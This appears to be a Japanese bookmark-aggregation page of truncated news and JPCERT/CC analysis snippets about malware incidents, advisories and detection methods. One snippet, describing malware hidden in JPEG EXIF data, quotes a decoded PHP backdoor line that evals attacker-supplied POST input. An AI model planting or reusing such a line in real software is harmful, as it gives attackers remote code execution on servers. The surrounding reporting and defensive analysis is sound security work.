2022年末以降、一部のマルウエアでGoogleの検索結果に表示される広告サービスを悪用し感染させる手口が増加しているとして、セキュリティベンダやFBIなどが注意を呼び掛けています。ここでは関連する情報をまとめます。 Googleの広告悪用し偽インストーラー配布サイトへ誘導 マルバタイジングの一種で、SEO(Search Engine Optimization)ポイズニング、またはSERP(Search Engine Results Page)ポイズニングとも呼ばれることがあり、攻撃者はなりすまし対象のソフトウエア配布先に似せたドメイン名を取得し、これを表示させる広告をGoogleから購入する。 ソフトウエアのインストールを考える利用者は検索サービスでソフトウエアの名前で検索を行うことが一般的だが、攻撃者が用意した広告が検索結果の一番上に表示されることがあり、利用者は誤ってそれをクリックし
2024年5月28日、生成AIを使用したマルウエアを作成した容疑で警視庁が男を逮捕したことが報じられました。ここでは関連する情報をまとめます。 対話型生成AIを使用しランサムウエアらしきものを作成 男の容疑は不正指令電磁的記録作成。2023年3月31日に自宅PCやスマートフォンを使用して、対話型生成AIを使用し、不正プログラムの設計情報を組み合わせてマルウエアを作成した疑い。2024年3月に警視庁は男を偽造身分証を使用してSIMカードの不正契約を行ったなどとして詐欺容疑(今回の事案とは別件)で逮捕しており、*1 捜査より自宅から押収されたPCを解析したところマルウエアが発見された。*2 生成AIを使用したマルウエア作成の事案摘発は全国で初めてとされる。*3 男が作成したマルウエアは、実行環境のデータを破壊(暗号化とも報道)し、暗号資産の要求をする機能が含まれており、いわゆるランサムウエアに
本サイトは、アクセスする PC が、不正な DNS サーバを参照していないかで感染の有無を確認しています。 Web アクセスに Proxy を使用している場合など、正しく確認できない場合があります。 DNS Changer マルウエアに感染していないことを保証するものではありません。
韓国インターネット振興院(KISA)は現地時間2013年3月21日、民・官・軍合同対策チームの調査で判明した被害の全容を発表した。これによると、放送局や金融機関6社が被害に遭い、パソコンとサーバーの合計で3万2000台が影響を受けたという(関連記事1、関連記事2、関連記事3)。 攻撃の実態調査は現在も継続しており、完全な正常化には少なくとも4~5日掛かると予想している。 マルウエア対策を実施しているはずの大手企業が被害を受けたのは、企業内でセキュリティパッチを一括管理する更新管理サーバーがハッキングされたのが原因と発表した。これにより、マルウエアの企業内への侵入を許してしまったとしている。 農協銀行のシステムを分析したところ、中国のIPアドレス(101.106.25.105)がパッチ更新管理サーバーに接続して、悪意あるファイルを作成していたことが確認されたという。 韓国のセキュリティベンダ
2019年10月以降、日本国内にてEmotetの感染事例が急増しています。JPCERT/CCでは、次の通り注意喚起を発行しています。 JPCERT/CC: マルウエア Emotet の感染に関する注意喚起 https://www.jpcert.or.jp/at/2019/at190044.html JPCERT/CC: CyberNewsFlash マルウエア Emotet の感染活動について https://www.jpcert.or.jp/newsflash/2019112701.html JPCERT/CC: CyberNewsFlash マルウエア Emotet の感染に繋がるメールの配布活動の再開について (追加情報) https://www.jpcert.or.jp/newsflash/2020072001.html JPCERT/CC: CyberNewsFlash マルウェ
日本マクドナルドの店舗システムで起きている障害について同社は2017年6月19日、同システムがマルウエアに感染していたと発表した。複数店舗システムのコンピュータがマルウエアに感染し、外部に向けて大量のパケットを発信。通信を圧迫して、商品購入時のポイントサービスが利用できなくなったという。同社は新たに電子マネーや宅配サービスなども利用できない事象が起きていることも明らかにした。 同社はマルウエアの種類について「調査中」として明らかにしていない。この5月に世界的に発生したランサムウエア「WannaCry(ワナクライ)」の可能性もあるとした。ただ、ネットワーク経由で自己増殖して感染を広げるワームの動作はしていないという。同社アプリ登録者のデータをはじめとする機密データの社外流出は「確認できていない」(同社)。 マルウエアに感染したのは店舗に設置して販売管理などを担うシステムのコンピュータ。複数店
コンピューターを操作する人(2013年3月16日撮影、資料写真)。(c)THOMAS SAMSON / AFP 【5月29日 AFP】6種類の危険なマルウエアに感染した黒いサムスン(Samsung)のノートパソコンで世界最大級の脅威を表現した芸術作品が28日、米ニューヨークでオンラインオークションに出品され、130万ドル(約1億4000万円)を超える価格で落札された。 中国人アーティスト郭偶東(Guo O Dong)氏による「The Persistence of Chaos(混沌の継続)」という作品は、美術界に衝撃を与えた。 この作品は、今では旧式となったマイクロソフト(Microsoft)のオペレーションシステムWindows XPを搭載する2008年製造の10インチノートパソコンで、見た目はいたって普通だ。 しかしそのメモリーチップには、過去に大きな被害をもたらした6つのマルウエア、「
トロイの木馬型マルウエア、iesys.exeと、それを作成したクラッカーによる事件の全貌が、徐々に明らかになってきているようだ。報道 (朝日新聞デジタルの報道 1, 2, INTERNET Watch の記事) 及び、シマンテックの分析、トレンドマイクロの分析などによると、手口は以下の様な物である。 まず、トロイの木馬を送り込む手口である。これには 2 ちゃんねるのスレッドが悪用されたようだ。まず 2 ちゃんねるのスレッド「気軽に『こんなソフトありませんか? Part.149』の>>400に、被害者が『英単語を覚えるためにタイマーで時間測ってやりたいと思ってます キーボードでストップスタートができるタイマーありませんか?』と書き込む。その約 19 時間後に、犯人からのレス>>404『これで需要は満たすかな? とりあえずキーボード操作は可能 http://bit.ly/PPb66w』と書き込
マルウエア Emotet の感染に関する注意喚起
JPCERT-AT-2019-0044 JPCERT/CC 2019-11-27(新規) 2019-12-10(更新) I. 概要JPCERT/CC では、2019年10月後半より、マルウエア Emotet の感染に関する相談を多数受けています。特に実在の組織や人物になりすましたメールに添付された悪性な Word 文書ファイルによる感染被害の報告を多数受けています。 こうした状況から、Emotet の感染拡大を防ぐため、JPCERT/CC は本注意喚起を発行し、Emotet の主な感染経路、Emotet に感染した場合の影響を紹介した後、感染を防ぐための対策や、感染に気付くためにできること、感染後の対応方法などに関する情報を紹介します。 更新: 2019年12月2日追記 JPCERT/CC Eyes にて、マルウエア Emotet に関する FAQ を掲載したブログを公開いたしました。こち
欧州刑事警察機構(ユーロポール)は2021年1月下旬、大きな被害をもたらしたマルウエア「Emotet(エモテット)」を事実上壊滅させたと発表した。8カ国の法執行機関や司法当局などの協力により、Emotetを制御するサーバー(C&CサーバーあるいはC2サーバー)を押収。攻撃者がEmotetを操作できなくするとともに、既に感染しているEmotetの無害化を図っている。 オランダ警察やウクライナ警察などによると、Emotetに感染しているパソコンは100万台以上、被害額は25億ドル以上だという。ユーロポールなどは、Emotetを「世界で最も危険なマルウエア(World's Most Dangerous Malware)」としている。 Emotet感染パソコンで構成されるネットワーク(ボットネット)は、サイバー犯罪の巨大インフラとなっていた。これを壊滅させたのはものすごい快挙だ。 だが手放しでは喜
「貴組織にマルウエアに感染したホストがあるようです」とメールを受け取ったら?:セキュリティ事故対応の鉄則 日本ネットワークセキュリティ協会(JNSA)が2015年6月25日に行った「緊急時事ワークショップ〜他人事ではない、サイバー攻撃を受けた組織の選択肢」と題するパネルディスカッションでは、水際でマルウエア感染を防ぐことだけに専念するのではなく、事後の対応にも目を配る必要があるという前提で、必要な取り組みが議論された。 「JPCERT/CCです。貴組織の管理しているネットワーク内のホストがマルウエアに感染し、不審な通信が行われているようです」——もしこんなメールを受け取ったとき、あなたの組織や会社ではどう対応するか、ルールや体制を決めているだろうか? 2015年6月、日本年金機構が標的型攻撃を受け、「Emdivi」と呼ばれるマルウエアに感染して大量の個人情報が流出したことが発覚した。後述す
パソコンに感染してクレジットカード情報や通販サイトのパスワードなどを盗み取るマルウエアについて、感染経路の7割余りが、不正なソフトウエアのインストールが原因とみられることが情報セキュリティー会社の調査で分かりました。 職場や自宅のパソコンに感染してクレジットカード情報や、通販やSNSのパスワードなどを盗み取るマルウエアは、ここ数年被害が拡大しています。 どのような経路で感染するのか、去年から猛威を振るっている「レッドライン」と呼ばれる情報窃取型のマルウエアについて、情報セキュリティ-会社が日本の感染例920件余りの情報を解析したところ、74%が不正なソフトをみずからインストールしたことが原因とみられることが分かりました。 具体的には、▽オンラインゲームなどにずるして勝つための不正ソフトが41%、▽有料のソフトを無料で使えるようにする不正ソフトが31%でした。 一方、パソコンに自動的に表示さ
公式ストアで配信されるスマートフォン用アプリにマルウエア(悪意のあるプログラム)を仕込まれるケースが見つかっている。信頼性の高い大手ストアの審査をすり抜け、1億台超の端末にダウンロードされていた。利用者は知らないうちに個人情報などを盗まれる恐れがあり、専門家は自衛の必要性も指摘する。日常生活に役立つスマホアプリは誰もが使う社会インフラで、MMD研究所(東京・港)の2022年の調査によると日本で
7月9日 13時頃 (日本時間) に米国政府が運用していた暫定 DNS サーバは停止した模様です。 このページが表示されている方は、DNS Changer マルウエアに感染している可能性はありません。 「DNS Changer マルウエア感染確認サイト」の運用は7月9日で終了しました。 各位 <<< DNS Changer マルウエア感染確認サイト公開のお知らせ >>> JPCERT/CC 2012-05-22 I. 概要 JPCERT/CCは、JPCERT-AT-2012-0008 で注意喚起を行った DNS Changer マルウエアの感染を確認できる Web サイトを公開いたします。 DNS Changer マルウエア感染確認サイト http://www.dns-ok.jpcert.or.jp/ ※運用期間は、2012年5月22日~2012年7月9日を予定しています DNS Chan
米フロリダ州パームビーチにあるドナルド・トランプ大統領の別荘マーアーラゴ(2018年4月18日撮影)。(c)MANDEL NGAN / AFP 【4月3日 AFP】ドナルド・トランプ(Donald Trump)米大統領がフロリダ州に所有する別荘「マーアーラゴ(Mar-a-Lago)」で3月30日、複数の携帯電話とマルウエア(悪意のあるソフトウエア)が保存されたUSBメモリーを所持していた中国人の女が施設内に不法に侵入しようとし、逮捕された。2日に公開された法廷文書で明らかになった。逮捕時、トランプ氏は同施設に滞在していたという。 同州パームビーチ(Palm Beach)の連邦地方裁判所の関連文書によれば、逮捕されたチャン・ユージン(Zhang Yujing)容疑者は当初、自分がマーアーラゴの会員でプールに向かっていると主張し、施設に入ろうとした。 さらにチャン容疑者は中国系米国人の催しに参
Web広告からのマルウエア感染「Malvertising」にどう対処すべきか:川口洋のセキュリティ・プライベート・アイズ(57)(1/2 ページ) セキュリティベンダーの調査結果などから、昨今特に増加している攻撃として注目を集めるようになってきた「Malvertising」。複雑なアドネットワーク経由でWebサイト閲覧者にマルウエアが送り込まれるこの攻撃に対して、各関係者はどのような対策を講じるべきなのか。川口洋氏が独自の調査結果を踏まえながら考察します。 連載目次 Web広告からのマルウエア感染 皆さんこんにちは、川口です。つい先日「Hardening 10 ValueChain」のリポート記事を出したばかりですが、どうしても2015年のうちに記事化しておきたいテーマがあったので、必死に原稿を書き上げました。 そのテーマは、「Web広告からのマルウエア感染」です。「不正広告」や「Malv
【ワシントン=共同】米紙ニューヨーク・タイムズは29日、米領グアムなどにある米軍基地につながる送電や通信、用水を操作するコンピューターネットワークの深部に、マルウエア(悪意のあるソフト)が仕掛けられていたことが分かったと報じた。米軍や米情報当局者は中国側の工作の一環とみている。マルウエアは有事に発動させる仕組みで、例えば台湾に軍事侵攻した際に起動させて米軍を混乱に陥れ、台湾防衛を遅らせるような
2019年4月から5月にかけて、日本の組織に対して、不正なショートカットファイルをダウンロードさせようとする標的型攻撃メールが送信されていることを確認しています。これらの標的型攻撃メールにはリンクが記載されており、クリックするとクラウドサービスからショートカットファイルがダウンロードされます。このショートカットファイル内にはダウンローダが含まれており、ショートカットファイルを実行することによって動作します。 今回は、この最近確認された検体の詳細について紹介します。 ダウンローダが動作するまでの流れ 以下は、ショートカットファイル実行からダウンローダが感染するまでの流れを示しています。 図 1:ショートカットファイルからダウンローダが感染するまでの流れ JPCERT/CCで確認しているショートカットファイルは、以下のようなコードが含まれており、実行すると外部からVBScriptを含むHTML
マルウエア(ウイルス)を使ったサイバー攻撃が後を絶たない。マルウエアの検出手法としては、既知ウイルスのプログラム(コード)の特徴と照合するパターンマッチングや、プログラムの振る舞いから判断するビヘイビア検出などが一般的だ。こういった従来の方法は、マルウエアのプログラム(コード)に着目している。 現在、内閣官房情報セキュリティセンター(NISC)の内閣事務官を務める大坪雄平氏は、それらとは全く異なるアプローチの検出手法を開発した。ファイルのサイズや構造に着目した方法だ。マルウエアによっては、ファイルサイズを調べるだけで検出できるという。新しい検出手法について、開発者の大坪氏に話を聞いた。
65万台以上のMacが感染したと見られるFlashbackの騒動がようやく沈静し始めたばかりだが、Kaspersky LabがMacをターゲットにした新たなマルウエア「Backdoor.OSX.SabPub.a」の広がりを報告している。「保護されていないMac OS X環境が理論的に危険であるのを示したFlashfake (Flashback)と異なり、Backdoor.OSX.SabPub.aは脆弱性を残したAppleのコンピュータがサイバー犯罪によって完全にコントロールされる可能性を具体的に示している」と警鐘を鳴らす。 4月上旬に発見されたSabPubは、Flashbackと同じようにJavaの脆弱性を利用して入り込んでくる。感染したマシンでSabPubが行動を開始するとリモートサイトに接続し、米国に存在するコントロール・サーバからのコマンドを待つ。 感染数は比較的少ないが、これはター
巨額の仮想通貨が流出した大手交換会社「コインチェック」は、記者会見で、今回の問題の原因に関する調査結果を明らかにしました。 それによりますと、外部の何者かが従業員のパソコンに「マルウエア」と呼ばれる不正なプログラムを感染させて会社のネットワークに不正にアクセスし、「NEM」の管理に使われる「秘密鍵」と呼ばれるパスワードを盗み出し、流出させたことが想定されるとしています。
セキュリティ・キャンプ全国大会2015でのマルウエア分析講義(2015-09-10) - JPCERT/CC Eyes
「コードから読み解くマルウエアの真実」 5日間に渡るセキュリティ・キャンプの中で、私が担当したのは6時間分の講義でした。マルウエア分析をするためにはOSやネットワークといった多岐にわたる知識が必要となりますし、分析手法に関しては環境構築方法や様々なツールの使い方を知る必要があります。しかしながら、短い時間の講義にあれこれを詰め込むのは難しいため、セキュリティ・キャンプでは人気の高い「静的分析手法(リバースエンジニアリング)」を主に取り上げることにしました。静的分析手法はマルウエアに含まれるコードを読む手法であり、他の分析手法よりも難しく、分析に長い時間を要しますが、より詳細にマルウエアの挙動を明らかにすることができます。 講義は次の2部構成で行いました。 前半2時間 マルウエアの現状と分析手法についての基礎知識を説明してから、静的分析の基礎(アセンブリ言語や効率的なコードの読み方など)をハ
マルウエアと正面から向き合うのはもうやめよう
2月3日は節分。「鬼は外・福は内」と豆まきをしたご家庭も多いだろう。災いを招く鬼は家に入れず、外に追いやっておくのが一番だ。 記者はこのところサイバーセキュリティを追っている。絵心が乏しいので、サイバー攻撃の仕組みの絵を描くとき、マルウエア(悪意のあるソフトウエア)はたいてい丸に角が2本生えたアイコンになる。キバの生えた口を付けることもある。そのイメージは、豆まきの時に付けるお面の鬼にそっくりだ。 結論を先に書くと、このところサイバーセキュリティ分野では、攻撃者と無理に全面対決せず、マルウエアをずっと組織の外に追いやっておく「無害化」を新たな対策として検討する時が来ているのではないか、逃げるが勝ちで攻撃者とのいたちごっこをやめよう、というものである。 あくまで攻撃者優位という現実
重要インフラ狙うマルウエア「トリトン」、新たな攻撃を確認
サイバーセキュリティーシステムにつながれたケーブル(2017年1月24日撮影、資料写真)。(c)PHILIPPE HUGUEN / AFP 【4月14日 AFP】石油・ガスプラントや水処理施設に被害を及ぼし得るマルウエア「トリトン(Triton)」を使った新たなサイバー攻撃を確認したと、米サイバーセキュリティー会社ファイア・アイ(FireEye)の専門家らが明らかにした。 ファイア・アイは10日付で自社サイトに掲載した情報の中で、攻撃対象の詳細には触れずに「重要インフラに対するトリトンを使った新たな侵入事案」に対応中だと明らかにし、産業用制御システムを備えた石油やガス、水道などの施設に対し、ネットワーク上のトリトンの活動に警戒を強めるよう呼び掛けた。 2017年にサウジアラビアの石油化学プラントが停止したことで初めてトリトンの存在が明るみに出た。調査の結果、トリトンは独自のハッキング用ソフ
マルウエアDatperの痕跡を調査する~ログ分析ツール(Splunk・ELKスタック)を活用した調査~ (2017-09-25) | JPCERTコーディネーションセンター(JPCERT/CC)
Top > “インシデント”の一覧 > マルウエアDatperの痕跡を調査する~ログ分析ツール(Splunk・Elastic Stack)を活用した調査~ (2017-09-25) 2017-08-17号では、プロキシサーバのログなどに含まれるマルウエアDatperの通信を検知するためのPythonスクリプトを紹介しました。今回は、それを活用し、ログ分析ツールでDatperの通信を調査するための環境設定方法を紹介します。利用するログ分析ツールに応じて使い分けられるよう、Splunk編とElastic Stack編を用意しました。 Splunk編 まず、SplunkでDatperの通信ログを抽出するため、次に述べる方法でカスタムサーチコマンドを作成します。この方法で作成したコマンドはSplunk 6.3以降で使用できることを確認しています。 Splunkのカスタムサーチコマンド作成と調査 カ
中国製スマホにマルウエア―セキュリティー会社が確認 - WSJ
<h4>WSJJapan のフェースブックページ</h4><div style="border: none; padding: 2px 3px;" class="fb-like" data-href="http://www.facebook.com/japanwsj" data-send="false" data-layout="button_count" data-width="250" data-show-faces="false" data-action="recommend"></div> <h4>WSJJapan をツイターでフォローする</h4><a href="https://twitter.com/wsjjapan" class="twitter-follow-button" data-show-count="true">Follow @wsjjapan</a>
攻撃グループBlackTech が使用するLinux用マルウエア (ELF_TSCookie) - JPCERT/CC Eyes
以前のJPCERT/CC Eyesで攻撃グループBlackTechが使用するマルウエアTSCookieやPLEAD、IconDownについて説明しましたが、この攻撃グループは他にもいくつかのマルウエアを使用することが分かっています。これまで紹介したマルウエアはWindows OSに感染するものでしたが、JPCERT/CCの調査では、Linux OSに感染するTSCookieやPLEADの亜種が存在することを確認しています。 今回は、攻撃グループBlackTech が使用するLinux 版TSCookieについて紹介します。 TSCookie のWindows版とLinux版の違い Linux 版TSCookieはWindows版と同じコードを多く使用しているため、機能のほとんどが同一です。図1はTSCookie のWindows版とLinux版のコードの一部を比較した結果です。 図 1:T
生成AI(人工知能)などを悪用した「ディープフェイク」が大きな脅威になっている。その1つが「顔交換」。自分の顔を他人の顔にすげ替えた動画や画像を生成する。無料あるいは安価なツールやサービスが出回り、誰でも簡単に試せる状況になっている。 顔交換の悪用方法の1つが、生体認証の回避である。顔交換で他人になりすまし、顔認証をパスして不正にログインする。セキュリティー企業の英iProov(アイプルーブ)によると、顔交換を悪用したサイバー攻撃が2023年後半に急増。2023年前半と後半を比べると、報告件数が8倍以上になったという。 顔交換を実現するには、なりすましたい相手の顔情報を盗む必要がある。そのために開発されたと思われるマルウエアを、シンガポールのセキュリティー企業Group-IB(グループIB)が2024年2月15日(現地時間、以下同)に報告した。 Androidスマホ版(Android版)と
謎の多いマルウエア「Duqu」
産業制御システムを狙ったマルウエア「Stuxnet」と関連があるとみられる新しいマルウエア「Duqu」が見つかり、セキュリティベンダー各社がブログで解説している。例えばフィンランドのエフセキュアや米ウェブセンスが、Doquに関する解説をそれぞれブログで掲載している。 ロシアのカスペルスキーラボも、Q&A形式にまとめて説明した。 DuquはStuxnetを作成したグループによって記述されたと見られるトロイの木馬で、システムに入り込んでバックドアとして機能する。個人情報を盗み出すことを主な目的としており、この点がStuxnetと大きく異なる。侵入の手口はまだ解明されていない。 Duquに関する最初の言及は、ハンガリー人ブロガーが9月8日に投稿した記事で、DuquのファイルのMD5値を書き示していた。しかしこのブロガーはのちに、関連する投稿を削除してしまった。 投稿内容の画像 Duquは認証局を
「マルウエア」総まとめ~その特徴と分類方法~
「ウイルス」「ワーム」「スパイウエア」「ボットネット」「フィッシング」---。現在,インターネットにはさまざまな悪質なプログラムや攻撃,脅威が出回っている。総称して「マルウエア(Malware malicious software:有害プログラム,悪意のあるソフトウエア)」などと呼ばれるこれらのプログラム/脅威は,インターネット・セキュリティにある程度詳しい方でも,それぞれの違いや特徴を述べることは難しい。 そこで本稿では,マルウエアの代表的な分類(カテゴリ)を紹介するとともに,最近話題になっているマルウエアや脅威を解説する。加えて,マルウエア/脅威に関する新たな分類方法を提唱したい。マルウエアの理解や対策のために役立てていただければ幸いである。 なお,本稿で紹介する分類などは,筆者がマルウエア対策を進める上で独自にまとめたものであり,特に権威付けされたものではないことをお断りしておく。ま
» 【緊急】チェックサイトですぐに診断を! 悪質なマルウエアに感染していると7月9日以降ネットにアクセスできなくなるぞッ 特集 皆さんに大至急お伝えしたいことがある。それは、もしもあなたのPCが悪質なマルウエアに感染していた場合に、7月9日以降ネットにアクセスできなくなる可能性があるというのだ。これは2011年末にFBI(米連邦捜査局)が、「DNS Changer」というマルウエアを利用していた犯罪グループを逮捕した。それによって、感染していた人が知らないうちにアクセスしてサーバーが停止されるによるものなのだとか。 全世界で50万台のPCが影響を受けるというのだが、あなたのマシンは大丈夫だろうか? まだチェックしていたのという方は、すみやかに確認することをおすすめする。 一般社団法人「JPCERTコーディネーションセンター」(JPCERT/CC)は、2012年5月22日にプレスリリースでこ
Import APIとFuzzy Hashingでマルウエアを分類する ~impfuzzy~(2016-05-09) - JPCERT/CC Eyes
Top > “マルウェア”の一覧 > Import APIとFuzzy Hashingでマルウエアを分類する ~impfuzzy~(2016-05-09) 一般に、マルウエア検体の調査は、既知のマルウエアかどうかを判別することから始めます。データベース化された多数の既知のマルウエアと調査検体との比較を高速に実行するために、ハッシュ関数をマルウエア検体に施して得られたハッシュ値が利用されます。 ハッシュ関数の中でも、MD5やSHA1などの伝統的なハッシュ関数の場合には、入力データが1ビットでも異なれば、まったく異なるハッシュ値になりますので、完全に同じではないが類似した既知の検体があれば、既知のマルウエアと判定したい場合には役に立ちません。 現在では、カスタマイズされた上で攻撃に使われるマルウエアがほとんどであるため、カスタマイズされた検体を類似していると判断できるようなハッシュ関数が望まれ
各位 JPCERT-AT-2012-0008 JPCERT/CC 2012-03-06(初版) 2012-03-07(更新) <<< JPCERT/CC Alert 2012-03-06 >>> DNS 設定を書き換えるマルウエア (DNS Changer) 感染に関する注意喚起 https://www.jpcert.or.jp/at/2012/at120008.html I. 概要 JPCERT/CC では、DNS 設定を書き換えるマルウエア(以下、DNS Changer) に 関する情報を入手しました。DNS Changer は2007年頃にはじめて検出された マルウエアですが、DNS Changer に感染した PC は、現在でも世界中で数十万 台以上存在し、日本国内でも相当数の PC が感染しているとのことです。 また、2011年11月に米国連邦捜査局 (FBI)により、不正な D
機器の動作を確実に止める方法は、電源をオフにすることだ。だがオフにしても一部の機能は有効なままの機器がある。その1つがiPhoneである。例えば基本ソフトiOS 15以降では、電源をオフにしても24時間以内なら「探す」機能が有効だ。別の機器を使えば、電源がオフになったiPhoneの現在地を確認できる。だがユーザーのほとんどは、電源をオフにすれば全ての機能が停止していると思っているだろう。電源を
米カリフォルニア(California)州パサデナ(Pasadena)のアップルストア(Apple Store)でスマートフォン(多機能携帯電話)を手に取る人(2014年9月19日撮影)。(c)AFP/ROBYN BECK 【11月7日 AFP】米アップル(Apple)のコンピューター経由で同社のスマートフォン(多機能携帯電話)「iPhone(アイフォーン)」に感染するマルウエア(悪意のあるソフトウエア)が新たに見つかり、サイバー犯罪に強いとされてきたアップルの端末に脅威を与えていると、米コンピューターセキュリティー会社パロアルトネットワークス(Palo Alto Networks)が警告している。 同社によると「ワイヤーラーカー(WireLurker)」と名付けられた新種のマルウエアは「アップルのプラットフォームを標的としたこれまでの脅威の中で、前例のない特徴を持って」おり、企業や政府、
メタデータに埋め込まれたマルウエア
今回は攻撃者による“だまし”に関するブログを中心に紹介する。最初は、JPEG画像のメタデータにマルウエアを仕込むケース。JPEG画像のメタデータにマルウエアを仕込んだPHPバックドアをスペインのドメイン(.es)で見つけたとして、ブログで注意を促している。同様の手口は、今年6月に米スキュリが報告している。 JPEGファイルのコードを見ると興味深い文字列が並んでおり、画像のEXIFデータと合致する。 JPEGファイルのコード 画像のEXIFデータ EXIFデータのModelo(モデル)情報とMarca(メーカー)情報に同じ文字列が確認できる。これを解読すると「if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"])); 」となり、POSTパラメータ「zz1」を通じて取得するいかなる数値も実行する。 コードの実行には、PHPの「ex
露Kaspersky Labの日本法人であるカスペルスキーは2012年8月17日、8月9日に発見され、既存のFlameとの設計の類似性から米国とイスラエルによる国家主導で開発された疑いがあるとされているマルウエア「Gauss」(ガウス)について、暗号化ペイロード(データ)を解読する協力者の募集を始めたと発表した(関連記事:高度なマルウエア「Flame」は米国とイスラエルの共同開発、米紙が報道 )。 Gaussは、感染したマシンからWebブラウザのパスワードやオンラインバンキングのログイン情報、システム設定データなど様々な情報を詐取する機能を備えた高度なマルウエア。カスペルスキーでは「サイバースパイ型ツールキット」と分類している。同社によれば、2012年5月以降、Gaussは中東を中心に2500件以上もの感染が報告されている。 「Gaussの主な機能や特徴、通信方法などについての解明はほぼで
縮小表示プレビューに偽装したアイコンをもつマルウエア (2015-03-19) - JPCERT/CC Eyes
メールに添付されるマルウエアには、脆弱性を悪用する文書ファイルもありますが、それよりも実行ファイルもしくはその圧縮ファイルが今日では主流になっています。JPCERT/CCでも、実行ファイル形式のマルウエアをユーザが自ら実行することでマルウエアに感染した事例を確認しています。 一見して不審に見える実行形式の添付ファイルをわざわざ開いて実行してくれるほど無防備なユーザは数が限られるため、マルウエアに感染させるためには、多くの場合、添付ファイルを無害なファイルに偽装して、ユーザにファイルを開かせる手法が用いられます。その代表的な手法として、アイコンを一見無害に見える他のアイコンに偽装する方法があります。これまでの偽装は、図 1のようなアプリケーションごとに定義されたアイコンによって行われてきましたが、セキュリティ教育を受けたユーザを欺くことが難しくなりつつあります。 図 1: アイコンを偽装した
ショートカットファイルから感染するマルウエアAsruex(2016-06-23) - JPCERT/CC Eyes
JPCERT/CCでは、2015年10月頃から、不正なショートカットファイルが添付されたメールが宛先の組織を絞り込んで送信されていることを確認しています。このショートカットファイルを開くと、Asruexと呼ばれるマルウエアに感染します。Asruexは、リモートから操作する機能を持ったマルウエアで、メールを送信している攻撃者はこのマルウエアを利用してターゲットにした組織に侵入を試みていると考えられます。なお、このマルウエアは「DarkHotel」と呼ばれる攻撃グループに関連しているとマイクロソフトがブログ[1]に記載しています。(マイクロソフトは、この攻撃グループを「Dubnium」と呼んでいます。) 今回は、Asruexの詳細について紹介します。 Asruexが感染するまでの流れ 図1は、ショートカットファイルを開いてからAsruexに感染するまでの流れを示しています。 図 1:ショートカ
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
検索結果に表示される広告を悪用したマルウエアの拡散についてまとめてみた - piyolog
マルウエア作成に対話型生成AIを悪用した事案についてまとめてみた - piyolog
JPCERT コーディネーションセンター DNS Changer マルウエア感染確認サイト
<<< JPCERT/CC Alert 2010-02-03 >>> FTP アカウント情報を盗むマルウエアに関する注意喚起
マルウエアまん延の原因はパッチ更新管理サーバーのハッキング、韓国政府機関が発表
マルウエアEmotetへの対応FAQ - JPCERT/CC Eyes
マックのシステム障害はマルウエアが原因、大量パケットで通信が遮断
6種類のマルウエアに感染したノートPCは「芸術作品」1.4億円で落札
遠隔操作するマルウエアを使ったクラッカーによる冤罪事件、徐々に手口が明らかに | スラド セキュリティ
最も危険なマルウエア「Emotet」が壊滅、アジト急襲のウクライナ警察が見たもの
「貴組織にマルウエアに感染したホストがあるようです」とメールを受け取ったら?
マルウエア 感染の7割余 不正ソフトのインストールが原因か | NHKニュース
公式ストアのスマホアプリにマルウエア ダウンロード1億台 - 日本経済新聞
DNS Changer マルウエア感染確認サイト公開のお知らせ
トランプ氏別荘に不法侵入、中国人の女逮捕 マルウエア入りUSB所持
Web広告からのマルウエア感染「Malvertising」にどう対処すべきか
米軍基地にマルウエアか 中国の工作と推定、有事に起動 - 日本経済新聞
マルウエアが含まれたショートカットファイルをダウンロードさせる攻撃 - JPCERT/CC Eyes
ファイルサイズから“悪意”を見抜く、マルウエア検出の新手法
Flashbackより危険、Macに裏口を作る新マルウエアが明らかに
コインチェック マルウエア感染でNEM流出か | NHKニュース
「顔」を盗むiPhoneマルウエア出現、ディープフェイクで銀行口座に不正アクセス
【緊急】チェックサイトですぐに診断を! 悪質なマルウエアに感染していると7月9日以降ネットにアクセスできなくなるぞッ
DNS 設定を書き換えるマルウエア (DNS Changer) 感染に関する注意喚起
iPhoneは電源オフでも動き続ける マルウエアの脅威 - 日本経済新聞
アップルのPC経由でiPhoneに感染、新種マルウエアに警戒
カスペルスキー、国家主導型マルウエア「Gauss」の暗号化データ解読協力者を募集